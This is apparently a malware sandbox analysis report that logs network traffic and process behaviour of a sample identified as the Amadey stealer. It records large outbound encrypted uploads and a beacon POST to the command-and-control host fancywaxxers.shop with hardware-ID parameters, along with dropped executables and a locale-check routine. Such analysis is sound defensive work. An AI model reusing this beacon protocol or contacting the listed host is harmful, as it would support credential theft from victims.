2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 10 3c 7a 3b 0d e7 0f 64 ae 2d bc 19 ae ee fd a0 4a 6a 38 b2 fb 0e bb b3 ac 76 3c b1 da ab a8 6a 7e 3d 64 d8 ab 6c 64 32 9c bb 92 59 55 b5 b0 f9 21 c4 6f f6 68 19 f9 cb df af 21 c6 bb 00 ee 27 27 ad 9f 66 01 ff fd c8 2c 5f e9 d0 57 87 eb 0a b8 8b e7 59 83 99 81 3b 43 5f c4 9c 37 0e 29 c8 49 2d 6d fe b8 bd 46 1f fd 57 4d d8 c4 f9 eb eb 8d 0c d1 b1 e5 fb 0e d5 f3 df c2 59 63 4f 05 6b 3a 7e af 99 fc 49 e1 5b 0d a7 a3 8a 59 a4 3d 37 92 f6 d0 bb fc 55 6e 5f 1f 16 b6 32 e6 94 38 54 dd 7d 37 54 72 f3 9f 21 f6 7a 55 3d 7f 0e 4b 39 6c 34 f2 ab 87 81 45 79 47 e4 83 fd de 41 41 b0 5f e3 e4 b3 1d 46 de 9f f6 61 60 6e d5 3e c6 99 fc 38 8f 7d 0c f2 99 e3 20 d4 eb 57 61 7d dd 3b c1 a9 0f 18 20 f9 55 18 2b 14 4f a3 d3 6e 15 42 e3 24 e8 3b b9 5d 50 e1 5f a9 f1 ff 0a 1e cf Data Ascii: <z;d-Jj8v<j~=dld2YU!oh!''f,_WY;C_7)I-mFWMYcOk:~I[Y=7Un_28T}7Tr!zU=K9l4EyGAA_Fa`n>8} Wa}; U+OnB$;]P_
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 73 af 1c 93 c5 c4 fb 22 36 49 ba 69 29 d5 95 32 9e 0d bd 01 45 cd d0 bf cc 89 3f 5b 60 a9 cf f2 29 8c 36 e3 67 13 0e 03 cc ba 3f a3 e9 9e 5b a7 0f 37 f2 ce 7f 45 45 5a 3f df 21 f9 62 06 00 cf 4e c5 19 cc 57 4e d6 3d ff cd 65 fd 37 91 d3 a7 7d 4b 29 59 1b dd b4 cb 7a e3 3d 2d a3 2f 24 7d cf 85 c1 9f 57 e3 d9 30 c4 2d 19 c5 79 ac ba 1d d3 81 77 71 c1 93 af 2e 98 19 ac c8 da 8e da 51 1d 1c 2d 71 36 2a 20 99 bb ec 69 ba 76 ef 0b f5 27 6b 20 cf 94 3e f7 a8 78 e7 ee fe af 43 f6 db 01 fa 3b 85 25 60 38 f1 33 92 44 53 a0 19 f1 03 5d 7e 28 9a 17 4c 94 67 6b a0 bb 79 98 b3 08 a0 84 a4 e0 af 49 1d 4f e6 af ca 94 00 9a 70 04 04 7a 84 ce 15 f3 40 39 fc ed 68 84 10 10 10 86 fd 6f 67 71 91 5a 81 1d 3a db c3 50 97 b7 c0 fe a8 a9 1e e8 fe 61 4d e6 a8 41 d7 5e d2 59 40 ac Data Ascii: s"6Ii)2E?[`)6g?[7EEZ?!bNWN=e7}K)Yz=-/$}W0-ywq.Q-q6* iv'k >xC;%`83DS]~(LgkyIOpz@9hogqZ:PaMA^Y@
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: ac 1d 9e fa 07 da ba 89 2d e6 57 a8 ea 17 6a 0c aa 8d 5a 19 2b 11 ad ff db ba 8e e0 ba 6b 99 71 2a 3c 42 a5 ea 74 26 06 64 95 23 de fc 3f a1 fa ff e4 6c 03 38 cd cc 96 22 02 e6 30 e0 1a 7a 6a c4 5e 12 6a 7a b9 dd f5 8b 13 b0 80 03 72 0c 09 d9 0d 3b 96 08 10 ba 9d af 0a 05 29 c1 e9 c2 2b 06 80 8c 08 13 05 07 ba ee 00 d3 ee fa 60 0c 5b 0d d5 72 ca df a8 70 a8 65 0e ff cf 24 aa 17 7d 74 a8 55 bc 00 19 f3 4a 82 fc c1 0c c2 c9 67 d4 85 18 7d 97 0b 7a 3d 9b ef 2e 8a 23 ca 90 d3 b4 d8 56 5c af a3 70 f2 a0 61 4a 75 ac d2 0d d1 29 94 80 05 91 8a d8 3c bc d4 4e 47 10 d9 17 7d ac 37 67 3f 6e 86 eb 72 77 d6 2a a8 b0 29 20 56 72 12 37 f7 fa 21 9b ad 11 47 87 6f f1 17 05 8d a3 0b df 79 25 14 3a c4 ad cc e8 29 d0 3a 0f bb 40 c4 77 d2 a7 52 82 af 2d 54 69 12 e3 36 ae f5 Data Ascii: -WjZ+kq<Bt&d#?l8"0zj^jzr;)+`[rpe$}tUJg}z=.#V\paJu)<NG}7g?nrw) Vr7!Goy%:):@wR-Ti6
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 76 fd 76 cd bc c2 65 70 c7 ef 19 9f ef c8 38 cc 1f e9 7f 67 26 0a 00 c0 11 06 1a 89 50 28 60 ae 4f 4d 3d 18 49 3b 0f e7 87 d7 61 4f 28 37 3a 6f f7 40 5c f5 fe c3 06 60 0d 9b a7 c0 ab 3f 46 6e 0e 51 04 c0 ab a5 36 24 5d 81 45 4f 09 fd 55 7a c0 00 3b 15 a0 81 84 78 11 87 10 26 54 fa 3d 26 f7 34 21 26 b2 da f7 4b ab c0 0b 7d 6f c9 9b 2d 23 7f df b0 63 55 75 1c 72 14 16 ae 7f ae 77 ab f4 fa 1b 88 3c be 71 79 8f 0c d0 be 39 34 f1 0f 66 e3 2b c4 28 ab 3e 86 63 08 8e e9 60 84 a0 85 46 a1 5e c9 9f b2 f4 c6 3d 97 ce e4 62 7d 0b 0b 6a 08 fc 73 70 7c 62 99 8e 68 78 7d 1b 6c 97 8d ca 43 64 f5 c5 83 d8 ce bf 92 93 bf 82 ec 40 f0 c6 94 54 34 f0 8a 71 16 90 f3 f0 57 52 05 e8 ed a1 9f f5 c1 bb 46 e3 1d a7 6c 3e 7c 7b e1 41 c4 20 df ee 21 92 e3 11 5b 1d 3e 74 2b 93 2c 74 Data Ascii: vvep8g&P(`OM=I;aO(7:o@\`?FnQ6$]EOUz;x&T=&4!&K}o-#cUurw<qy94f+(>c`F^=b}jsp\|bhx}lCd@T4qWRFl>\|{A ![>t+,t
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 9d 5a 4c a9 7e 01 ef 49 ae df 9e 62 6c 48 eb fc 17 ba 20 23 a9 98 8b 45 29 da f1 20 0e 4a d6 d7 3e 84 c8 ec 02 b6 4b ea 96 07 c4 30 30 fe 6c b8 bd 29 a1 d2 ea b9 38 fc 59 20 8d f5 db 95 f5 fb 9f ba 9a 67 11 dc cd 9c ed 49 8e d2 1b d7 1a 45 8e 59 30 4b 61 e1 c8 c6 1e 6b b6 79 fc 62 38 ab 2d 71 47 3d 86 a2 3e c4 a0 32 08 e3 8d 7f bf 7d f1 eb 85 0d dd ee 15 ac fb cc 6b dc 65 64 ff 29 75 a3 d5 19 fa 32 eb 9f dd 52 03 54 55 86 0e 76 aa 87 07 d4 2c 7f ff e9 79 f3 52 88 a5 15 a1 28 6e b3 02 13 35 ff 46 f5 f4 fd 13 77 e6 9d fa 3c fd 72 7b 9e b6 08 04 d0 7d 6f 2a 05 e2 b5 c5 65 d7 94 f6 a2 f0 d1 ab 85 8f 2a 50 d9 57 82 18 a3 c7 d4 c2 7a bf 0b 7a ab fd 31 c9 a3 76 da bd ee a0 88 9f 16 f2 1c e1 c3 11 55 d1 3f ae 61 bb 6f 26 8e f6 fb 18 a4 cd 7c 5c 0c b8 dd 76 e8 85 Data Ascii: ZL~IblH #E) J>K00l)8Y gIEY0Kakyb8-qG=>2}ked)u2RTUv,yR(n5Fw<r{}oePWzz1vU?ao&\|\v
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 9b ec 6a 52 b0 e0 bb ed 20 5d 42 1d 3a d6 04 c0 51 1d 30 dd b9 b3 22 0e 22 39 c7 bc f6 60 f5 bc 99 04 68 19 51 a1 d5 dc bf 4f 7b 20 6a 1a fe 9d bb 4f 25 b5 40 c2 75 eb 8b 47 ae 35 c8 78 99 de df 22 d1 22 56 df cc 14 17 a7 88 ac 1c cf 2e ec ab 6c 78 5e 58 fc d3 1a c1 94 46 65 7c 6e 60 fd 27 04 0f 47 c3 27 44 81 1d fb 03 24 78 52 51 a5 07 90 a0 53 0a 34 9b f6 da 6d 4e 92 8c 84 a8 e4 16 0b c0 7c 75 7f 30 e8 6b 5d 25 4c 91 4e 08 40 c0 89 9c 17 4f 6a 7c b8 57 31 7c 1f 69 a7 31 64 d0 ed 8d b3 20 5d 13 77 19 03 09 03 19 9e 06 d0 d2 5f 7f 88 65 b8 39 1e 80 87 f5 87 98 5e 12 8f 2b cb 24 81 10 d3 51 9a ce 44 37 e9 23 98 0c de 1a e6 ec 25 f6 e5 bd 8c fd bc 73 e4 cd 93 eb 79 e0 58 0f 7d 82 e7 9d f0 23 45 9b a9 85 fc 36 45 90 32 cf 7f 09 b8 15 87 0e 90 e2 90 78 a6 fd Data Ascii: jR ]B:Q0""9`hQO{ jO%@uG5x""V.lx^XFe\|n`'G'D$xRQS4mN\|u0k]%LN@Oj\|W1\|i1d ]w_e9^+$QD7#%syX}#E6E2x
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: 18 77 30 23 d5 3e 33 72 bf 6c b3 ad de 93 ea a7 98 7e 25 15 38 00 3a f8 d7 3f ba 51 c4 6c d5 61 e6 59 c4 df 57 30 c9 f3 8c 74 76 2e 0b ef ed 03 fd 5a 2d 4c 42 d6 a1 b1 d9 b9 c0 c1 39 aa 0b d1 fc 80 3e 29 54 2f e1 d0 86 a0 28 2f 98 e6 10 53 12 15 5e 7f 21 cc 8d 8a 52 8c f9 d2 ab 6f ff 92 bf 46 69 b8 0d 61 85 85 62 4e 38 0c 55 bd 7c 82 6f e1 d5 29 53 dc 8a 8c e4 3b ce 87 f5 ca 50 55 99 59 07 c3 8c f8 ad 2d e0 19 63 47 cf db 89 f1 e1 f0 ea 93 3f 74 a3 48 1d 2c 54 2c e3 c5 12 17 0b 8a 65 4a 85 d7 cf 5a 50 55 d1 d7 10 94 e6 15 81 67 92 5c d5 20 a1 b8 75 6f 57 26 e8 05 01 02 dc 77 da 82 72 3f b6 9d d5 b4 8b 44 7a 04 eb e3 9a 57 b5 99 aa 6a 2a 39 59 57 c7 7e ca ba b7 2c a9 cb b7 87 05 f5 67 ed 07 de 0f b0 e6 1d 91 37 af 0a a9 fe ef 90 d3 0b 75 a6 94 59 dd ff 99 Data Ascii: w0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U\|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr?DzWj*9YW~,g7uY
2024-12-31 08:48:36 UTC	15331	OUT	Data Raw: be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46 3a 27 7e b8 08 0c cf 10 68 4f 00 eb 7e 34 ec bc 0b 64 ec 71 f8 df 71 b1 ce 6d 60 5a 16 21 08 9c 9c 1e 4b 94 be 3c a5 0a 24 57 b7 89 1c bc 1d a6 a6 53 d1 64 55 f3 e9 91 a9 68 Data Ascii: j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF:'~hO~4dqqm`Z!K<$WSdUh
2024-12-31 08:48:38 UTC	1139	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cupns8t37qkls3f6apf2l57thl; expires=Sat, 26 Apr 2025 02:35:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mvE2t%2FROSEyqTGFDS9cUQqVtxnNEnraX%2B7e97hIgeB8Yq1cpP5CGTRLiRjhOqgNJ9wE4IlBi1ucUJzN0Yh7b0mr0lPV1jvJDoUN%2F14waUc51hoqcXttMmY0RtlSML%2FCI3iWIgQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa902f4bc460f5b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1660&rtt_var=634&sent=371&recv=590&lost=0&retrans=0&sent_bytes=2842&recv_bytes=574709&delivery_rate=1710603&cwnd=221&unsent_bytes=0&cid=0ee0d4a77adb896d&ts=1573&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49742	104.21.112.1	443	6248	C:\Users\user\Desktop\Dl6wuWiQdg.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:48:38 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: fancywaxxers.shop
2024-12-31 08:48:38 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 42 43 35 46 38 44 42 39 44 37 36 31 32 35 44 34 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=BC5F8DB9D76125D420A4C476FD51BCB1
2024-12-31 08:48:39 UTC	1127	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 08:48:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ipqurao33pk30n5k88p33uft3n; expires=Sat, 26 Apr 2025 02:35:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1uD7l2WiN639J05z7S6g4m6QwK73SWFkFLZtc0eWkFvdha0LXSYf3FRKc8CiZ1PBGYSv%2FfBvdcwoLzLdHrnLUe0PrUznH3rxXcJLt9b2F3fZ%2Bq9T0QfAyH80PXI6YLZsqqDBYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa90301bff9c34f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1446&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=983&delivery_rate=1913499&cwnd=181&unsent_bytes=0&cid=19268dba855d4fde&ts=452&x=0"
2024-12-31 08:48:39 UTC	222	IN	Data Raw: 64 38 0d 0a 77 61 62 62 56 67 4e 64 31 2b 49 45 75 34 50 30 58 4e 6f 6b 2b 45 72 54 61 54 71 48 68 6b 65 65 48 50 74 76 43 42 6b 63 7a 56 2b 61 33 66 6b 6a 49 57 66 31 69 6e 44 50 38 38 34 41 39 58 6a 58 65 2b 74 63 46 4c 57 33 63 72 41 74 79 6c 77 6d 4b 43 71 52 63 4c 4c 53 76 6a 64 75 41 66 69 51 5a 64 58 6e 6d 7a 48 30 51 59 41 76 38 55 55 59 34 66 4a 6c 70 43 7a 58 54 57 30 37 4a 76 30 69 37 64 33 35 49 79 46 6e 39 59 70 77 7a 2f 50 4f 41 50 56 34 31 33 76 72 58 42 53 31 74 33 4b 77 4c 63 70 63 4a 69 67 71 6b 58 43 73 7a 37 55 7a 58 33 4b 6c 67 32 72 66 37 4a 6c 79 76 31 79 64 61 50 39 4c 58 50 4f 6b 66 61 34 77 32 51 6f 71 49 79 79 77 41 67 3d 3d 0d 0a Data Ascii: d8wabbVgNd1+IEu4P0XNok+ErTaTqHhkeeHPtvCBkczV+a3fkjIWf1inDP884A9XjXe+tcFLW3crAtylwmKCqRcLLSvjduAfiQZdXnmzH0QYAv8UUY4fJlpCzXTW07Jv0i7d35IyFn9Ypwz/POAPV413vrXBS1t3KwLcpcJigqkXCsz7UzX3Klg2rf7Jlyv1ydaP9LXPOkfa4w2QoqIyywAg==
2024-12-31 08:48:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:48:25
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Dl6wuWiQdg.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Dl6wuWiQdg.exe"
Imagebase:	0xd90000
File size:	1'868'288 bytes
MD5 hash:	B71B7AEDBA64DFAC7FB62B18FE22E956
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:48:43
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe"
Imagebase:	0xd50000
File size:	3'243'520 bytes
MD5 hash:	375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:48:46
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x780000
File size:	3'243'520 bytes
MD5 hash:	375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:48:47
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x780000
File size:	3'243'520 bytes
MD5 hash:	375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.2396944563.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:49:00
Start date:	31/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x780000
File size:	3'243'520 bytes
MD5 hash:	375CE25C0529862F6EE716A3E001BB0E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.9%
Total number of Nodes:	649
Total number of Limit Nodes:	23

Executed Functions

Function 00D55C83 Relevance: 20.8, APIs: 3, Strings: 8, Instructions: 1535registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,00000000,00000001,551B1C03,551B1C03), ref: 00D55DCC
RegQueryValueExA.KERNEL32(551B1C03,?,00000000,00000000,?,00000400,?,?,00000000,00000001,551B1C03,551B1C03), ref: 00D55DFA
RegCloseKey.KERNEL32(551B1C03,?,?,00000000,00000001,551B1C03,551B1C03), ref: 00D55E06

Strings

0000043f, xrefs: 00D5612B
invalid stoi argument, xrefs: 00D57090
00000419, xrefs: 00D56098
VUUU, xrefs: 00D56F41
Keyboard Layout\Preload, xrefs: 00D56054
stoi argument out of range, xrefs: 00D57081
00000422, xrefs: 00D560C9
00000423, xrefs: 00D560FA

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$VUUU$invalid stoi argument$stoi argument out of range
API String ID: 3677997916-1112634906
Opcode ID: 1891028f32113b3640aad51b92f6a02901ba59d240c95710bb0a6909d5b76614
Instruction ID: 1df7952f2d81375395909d6a9d80efbb010386e66ca19e660a29a75c8829696c
Opcode Fuzzy Hash: 1891028f32113b3640aad51b92f6a02901ba59d240c95710bb0a6909d5b76614
Instruction Fuzzy Hash: D7C21271A002189BDF28DF68CC85BEDB7B5EF45304F544299F809A72C1DB759A88CBB4

Function 00D5735A Relevance: 2.5, APIs: 1, Instructions: 1031
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
